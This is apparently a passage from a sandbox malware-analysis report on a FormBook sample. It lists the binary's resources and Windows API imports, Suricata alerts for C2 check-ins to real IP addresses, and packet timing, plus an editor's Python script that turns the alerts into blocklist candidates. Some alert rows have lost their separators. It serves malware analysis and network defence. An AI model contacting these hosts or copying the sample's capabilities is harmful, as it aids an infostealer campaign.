RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Imports
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
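The Suricata alert table that follows records FormBook check-ins to a sequence of hosts on TCP port 80, three POSTs and a GET per host, plus one inbound hit from a known sinkhole. The following is an added example, not part of the Joe Sandbox report: it takes an excerpt of those rows, transcribed by the editor into a pipe-separated layout rather than Suricata's native EVE JSON, and reduces them to per-host IOC records, counting GET and POST check-ins, recording first and last contact, and keeping any host for which a sinkhole signature fired out of the blocklist candidates. The victim is identified as the RFC 1918 side of each flow; the row format and the grouping logic are the editor's, not the report's.

```python
"""Reduce the sandbox's Suricata alert table to per-host C2 IOC records.

Added example, not part of the Joe Sandbox report. ALERTS is an excerpt of
the report's alert table, transcribed by the editor as pipe-separated rows
(not Suricata's native output); the grouping and sinkhole handling are the
editor's own. The victim is taken to be the RFC 1918 side of each flow.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime

# Timestamp|SID|Signature|Severity|Src IP|Src Port|Dst IP|Dst Port|Proto  (excerpt of the table)
ALERTS = """\
2024-10-30T04:56:10.140779+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.5|49900|54.67.87.110|80|TCP
2024-10-30T04:56:26.288725+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.5|49981|195.161.68.8|80|TCP
2024-10-30T04:56:28.819959+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.5|49982|195.161.68.8|80|TCP
2024-10-30T04:56:31.398107+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.5|49983|195.161.68.8|80|TCP
2024-10-30T04:56:33.945080+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.5|49984|195.161.68.8|80|TCP
2024-10-30T04:56:40.835616+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.5|49987|18.141.10.107|80|TCP
2024-10-30T04:56:48.804469+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.5|49990|18.141.10.107|80|TCP
2024-10-30T04:56:49.169655+0100|2018141|ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz|1|18.141.10.107|80|192.168.2.5|49990|TCP
2024-10-30T04:56:56.070267+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.5|49991|197.189.237.186|80|TCP
"""

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"  # accepts the report's "+0100" offset


def parse_alerts(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
        rows.append({"ts": datetime.strptime(ts, TS_FORMAT), "sid": int(sid), "sig": sig,
                     "severity": int(sev), "src": (sip, int(sport)), "dst": (dip, int(dport)),
                     "proto": proto})
    return rows


def remote_endpoint(row: dict):
    """(remote_ip, remote_port, outbound): the non-private side of the flow is the remote host."""
    if ipaddress.ip_address(row["src"][0]).is_private:
        return row["dst"][0], row["dst"][1], True
    return row["src"][0], row["src"][1], False


def summarize(text: str) -> dict:
    """Per remote host: GET/POST check-in counts, inbound hits, SIDs, ports, time window, sinkhole flag."""
    hosts = defaultdict(lambda: {"get": 0, "post": 0, "inbound": 0, "sids": set(), "ports": set(),
                                 "first": None, "last": None, "sinkhole": False})
    for row in parse_alerts(text):
        ip, port, outbound = remote_endpoint(row)
        h = hosts[ip]
        h["sids"].add(row["sid"])
        h["ports"].add(port)
        h["first"] = row["ts"] if h["first"] is None else min(h["first"], row["ts"])
        h["last"] = row["ts"] if h["last"] is None else max(h["last"], row["ts"])
        if "Sinkhole" in row["sig"]:
            h["sinkhole"] = True  # the host answered as a sinkhole: not actor-controlled
        if not outbound:
            h["inbound"] += 1
        elif "(GET)" in row["sig"]:
            h["get"] += 1
        elif "(POST)" in row["sig"]:
            h["post"] += 1
    return dict(hosts)


def blocklist_candidates(summary: dict) -> list:
    """Hosts that received check-ins and were not flagged as a sinkhole, in order of first contact."""
    live = [ip for ip, h in summary.items() if (h["get"] or h["post"]) and not h["sinkhole"]]
    return sorted(live, key=lambda ip: summary[ip]["first"])


if __name__ == "__main__":
    s = summarize(ALERTS)
    for ip, h in sorted(s.items(), key=lambda kv: kv[1]["first"]):
        tag = "  (sinkhole: exclude)" if h["sinkhole"] else ""
        print(f"{ip:16} GET={h['get']} POST={h['post']} sids={sorted(h['sids'])}{tag}")
    print("blocklist candidates:", blocklist_candidates(s))
```

Feed it the full table the same way. Two caveats before the host list becomes firewall rules: the AnubisNetworks sinkhole alert on 18.141.10.107 means that host is already operated by a sinkhole, not by the actor, so blocking it buys nothing and reporting it as live C2 would be wrong; and FormBook's XLoader lineage is documented to mix decoy hosts into its check-in rotation, so the remaining destinations are infrastructure the sample contacted, not necessarily infrastructure the actor controls. Pivot on the resolved domains and the repeated three-POST-then-GET pattern before deciding which of them to block.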
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T04:56:10.140779+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49900 | 54.67.87.110 | 80 | TCP
2024-10-30T04:56:26.288725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49981 | 195.161.68.8 | 80 | TCP
2024-10-30T04:56:28.819959+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49982 | 195.161.68.8 | 80 | TCP
2024-10-30T04:56:31.398107+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49983 | 195.161.68.8 | 80 | TCP
2024-10-30T04:56:33.945080+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49984 | 195.161.68.8 | 80 | TCP
2024-10-30T04:56:40.835616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49987 | 18.141.10.107 | 80 | TCP
2024-10-30T04:56:43.523161+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49988 | 18.141.10.107 | 80 | TCP
2024-10-30T04:56:46.132508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 18.141.10.107 | 80 | TCP
2024-10-30T04:56:48.804469+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49990 | 18.141.10.107 | 80 | TCP
2024-10-30T04:56:49.169655+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49990 | TCP
2024-10-30T04:56:56.070267+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49991 | 197.189.237.186 | 80 | TCP
2024-10-30T04:56:58.617053+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 197.189.237.186 | 80 | TCP
2024-10-30T04:57:01.163830+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49993 | 197.189.237.186 | 80 | TCP
2024-10-30T04:57:04.070060+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49994 | 197.189.237.186 | 80 | TCP
2024-10-30T04:57:30.742881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 162.0.238.246 | 80 | TCP
2024-10-30T04:57:33.302020+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 162.0.238.246 | 80 | TCP
2024-10-30T04:57:35.848987+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 162.0.238.246 | 80 | TCP
2024-10-30T04:57:38.392162+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49998 | 162.0.238.246 | 80 | TCP
2024-10-30T04:57:44.553479+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 31.31.196.17 | 80 | TCP
2024-10-30T04:57:47.023221+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 31.31.196.17 | 80 | TCP
2024-10-30T04:57:49.538844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 31.31.196.17 | 80 | TCP
2024-10-30T04:57:52.116985+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50002 | 31.31.196.17 | 80 | TCP
2024-10-30T04:58:05.947427+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 188.114.97.3 | 80 | TCP
2024-10-30T04:58:08.500508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 188.114.97.3 | 80 | TCP
2024-10-30T04:58:11.041197+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 188.114.97.3 | 80 | TCP
2024-10-30T04:58:13.602539+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50006 | 188.114.97.3 | 80 | TCP
2024-10-30T04:58:20.179645+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 206.119.82.147 | 80 | TCP
2024-10-30T04:58:22.726433+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 206.119.82.147 | 80 | TCP
                                                                    2024-10-30T04:58:25.276554+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009206.119.82.14780TCP
                                                                    2024-10-30T04:58:34.799142+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550010206.119.82.14780TCP
                                                                    2024-10-30T04:58:40.554521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011162.0.209.21380TCP
                                                                    2024-10-30T04:58:43.097311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012162.0.209.21380TCP
                                                                    2024-10-30T04:58:45.631525+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013162.0.209.21380TCP
                                                                    2024-10-30T04:58:48.193549+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550014162.0.209.21380TCP
                                                                    2024-10-30T04:58:54.945252+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500153.33.130.19080TCP
                                                                    2024-10-30T04:58:56.637693+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500163.33.130.19080TCP
                                                                    2024-10-30T04:58:59.148940+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500173.33.130.19080TCP
                                                                    2024-10-30T04:59:01.765592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500183.33.130.19080TCP
                                                                    2024-10-30T04:59:07.485163+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019144.34.186.8580TCP
                                                                    2024-10-30T04:59:10.038967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020144.34.186.8580TCP
                                                                    2024-10-30T04:59:12.589574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021144.34.186.8580TCP
                                                                    2024-10-30T04:59:15.119690+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550022144.34.186.8580TCP
                                                                    2024-10-30T04:59:21.101320+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023136.143.186.1280TCP
                                                                    2024-10-30T04:59:23.999596+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024136.143.186.1280TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 04:56:09.406234980 CET | 49900 | 80 | 192.168.2.5 | 54.67.87.110
Oct 30, 2024 04:56:09.411503077 CET | 80 | 49900 | 54.67.87.110 | 192.168.2.5
Oct 30, 2024 04:56:09.411623955 CET | 49900 | 80 | 192.168.2.5 | 54.67.87.110
Oct 30, 2024 04:56:09.419415951 CET | 49900 | 80 | 192.168.2.5 | 54.67.87.110
Oct 30, 2024 04:56:09.424748898 CET | 80 | 49900 | 54.67.87.110 | 192.168.2.5
Oct 30, 2024 04:56:10.098536968 CET | 80 | 49900 | 54.67.87.110 | 192.168.2.5
Oct 30, 2024 04:56:10.140655994 CET | 80 | 49900 | 54.67.87.110 | 192.168.2.5
Oct 30, 2024 04:56:10.140779018 CET | 49900 | 80 | 192.168.2.5 | 54.67.87.110
Oct 30, 2024 04:56:10.142271042 CET | 49900 | 80 | 192.168.2.5 | 54.67.87.110
Oct 30, 2024 04:56:10.147569895 CET | 80 | 49900 | 54.67.87.110 | 192.168.2.5
Oct 30, 2024 04:56:25.287586927 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:25.292890072 CET | 80 | 49981 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:25.292985916 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:25.303983927 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:25.309461117 CET | 80 | 49981 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:26.233187914 CET | 80 | 49981 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:26.288724899 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:26.390558958 CET | 80 | 49981 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:26.390644073 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:26.820065975 CET | 49981 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:27.838613033 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:27.843903065 CET | 80 | 49982 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:27.844010115 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:27.854671955 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:27.859946966 CET | 80 | 49982 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:28.769059896 CET | 80 | 49982 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:28.819958925 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:28.935393095 CET | 80 | 49982 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:28.935452938 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:29.367036104 CET | 49982 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:30.385541916 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:30.390904903 CET | 80 | 49983 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:30.391001940 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:30.401637077 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:30.406919956 CET | 80 | 49983 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:30.407078028 CET | 80 | 49983 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:31.351433039 CET | 80 | 49983 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:31.398107052 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:31.524503946 CET | 80 | 49983 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:31.524619102 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:31.913794994 CET | 49983 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:32.939102888 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:32.944839954 CET | 80 | 49984 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:32.944924116 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:32.955595970 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:32.960865021 CET | 80 | 49984 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:33.889121056 CET | 80 | 49984 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:33.945080042 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:34.059632063 CET | 80 | 49984 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:34.059835911 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:34.060986996 CET | 49984 | 80 | 192.168.2.5 | 195.161.68.8
Oct 30, 2024 04:56:34.066257954 CET | 80 | 49984 | 195.161.68.8 | 192.168.2.5
Oct 30, 2024 04:56:39.332382917 CET | 49987 | 80 | 192.168.2.5 | 18.141.10.107
